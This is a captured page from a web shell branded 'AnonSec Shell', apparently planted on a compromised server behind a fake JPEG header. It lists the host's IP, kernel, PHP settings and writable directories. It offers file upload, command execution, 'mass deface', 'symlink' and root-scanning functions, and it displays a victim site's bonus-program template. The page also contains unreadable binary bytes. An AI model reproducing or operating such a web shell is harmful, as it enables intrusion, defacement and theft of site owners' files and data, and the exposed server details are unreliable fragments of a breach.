JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/app/frontModule/templates/Pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/app/frontModule/templates/Pages/bonusProgram.latte
{layout "../@promo_layout.latte"}
{block content}
    <div class="col-md-12">
        <div id="bonus_header" class="clearfix">
            <h2>{$l["bonus-program-promoteus"]}</h2>
            <div class="bonus_points_top_wrapper">
                <div id="bonus_points_wrap">
                    <h2>{$l["stav-bonusoveho-konta"]}</h2>
                    <div class="bonus_points">{$bonusPoints}</div>
                </div>
            </div>
        </div>

        <div id="bonus_sidebar">
            <form method="post" id="bonusform" action="#">
                <input type="hidden" name="type" value="bonus_products"/>
                <h3>{$l['celkem-vyuzito-bodu']}</h3>
                <input id="used_points" readonly type="text" value="0" name="bonus_used_points"/>
                <h3>{$l['zvolene-darky']}</h3>
                <p id="bonus_selected_products">
                </p>

                <div id="bonus_selected_products_container" style="display: none;">
                </div>

                <h3>{$l['zvolena-doprava']}</h3>

                <div id="bonus_carriers">
                    <table n:inner-foreach="$bonusCarriers as $item">
                        <tr data-points="{$item['points']}">
                            <td width="20%"><input type="radio" data-points="{$item['points']}"
                                                   value="{$item['points']} b. | {$item['name']}" name="bonus_carrier"
                                                   class="bonus_carrier" id="bonus_carrier_{$item['id']}"
                                                   required="required"></td>
                            <td width="50%"><label for="bonus_carrier_{$item['id']}"><img src="/images/front/system/bonus-carriers/{$item['image']}"
                                                                                          alt="{$item['name']}"/></label>
                            </td>
                            <td width="30%"><label class="bonus_carrier_points"
                                                   for="bonus_carrier_{$item['id']}">{$item['points']} {$l['bonus-skratka']}</label>
                            </td>
                        </tr>
                        <tr data-points="{$item['points']}">
                            <td class="slim_td" colspan="3"><label
                                        for="bonus_carrier_{$item['id']}">{$item['name']}</label>
                            </td>
                        </tr>
                    </table>
                </div>
                <br/><br/>
                <p>{$l['prejete-si-nam-neco-sdelit']}</p>
                <textarea id="bonus_text" name="bonus_text"></textarea>

                <button type="submit" disabled>{$l['ziskat-bonus']}</button>
            </form>
        </div>

        <div id="bonus_content" class="clearfix">
            <h2>{$l["vybrat-si-darek"]}</h2>
            <div id="bonus_items" n:inner-foreach="$bonusItems as $item">
                <div class="col-lg-3 col-md-4 col-sm-4 col-xs-6 product_card_item_wrap">
                    <div class="product_card" data-points="{$item['points']}" data-code="{$item['code']}">
                        <div class="product_card_code_stock">{$l['bonus-program-skladem']}: {$item['quantity']}
                            <span n:if="$item['ordered']>0 && !is_null($item['date_available'])">
                            ({$item['ordered']}&nbsp;{$l['ks']}&nbsp;{$item['date_available']|date:'%d.%m.%Y'})
                        </span>
                        </div>
                        <img class="item-list-img" src="{$baseUrl}{$item['image']['min']}" alt="{$item['name']|noescape}"
                             title="{$item['name']}">
                        <div class="product_card_name">{$item['name'],70|truncate}</div>
                        <div class="product_card_points">{$item['points']} b.</div>
                        <a n:ifcontent="$item['code']" class="green_more" target="_blank"
                                n:href="Items:profile $item['code'], 'title'=>\Nette\Utils\Strings::webalize($item['name'])">{$l['vice']|noescape}</a>
                        <button class="addToBonusList" data-code="{$item['code']}" data-name="{$item['name']}"
                                data-points="{$item['points']}">{$l['bonus-program-vybrat']|noescape}</button>
                    </div>
                </div>
            </div>
        </div>
        <br class="clear"/>
    </div>
    <!-- MODAL - VLOŽENÍ PRODUKTU DO KOŠÍKU -->
    <div class="atc_modal">
        <h2>Vybraný produkt byl vložen do košíku</h2>
        <p class="atc_product">Univerzální fóliový rámeček, BOX026, 9*9 cm, barva bílá</p>
        <button class="atc_btn">Rozumím</button>
    </div>
{/block}
{block localScript}
    <script>
        $(document).ready(function () {
            $("#slider-range-max").slider({
                range: "max",
                min: 100,
                max: {$bonusPoints},
                value: 1000,
                slide: function (event, ui) {
                    $("#amount").val(ui.value);
                }
            });
            $("#amount").val($("#slider-range-max").slider("value"));
        });
    </script>
{/block}

Anon7 - 2022
AnonSec Team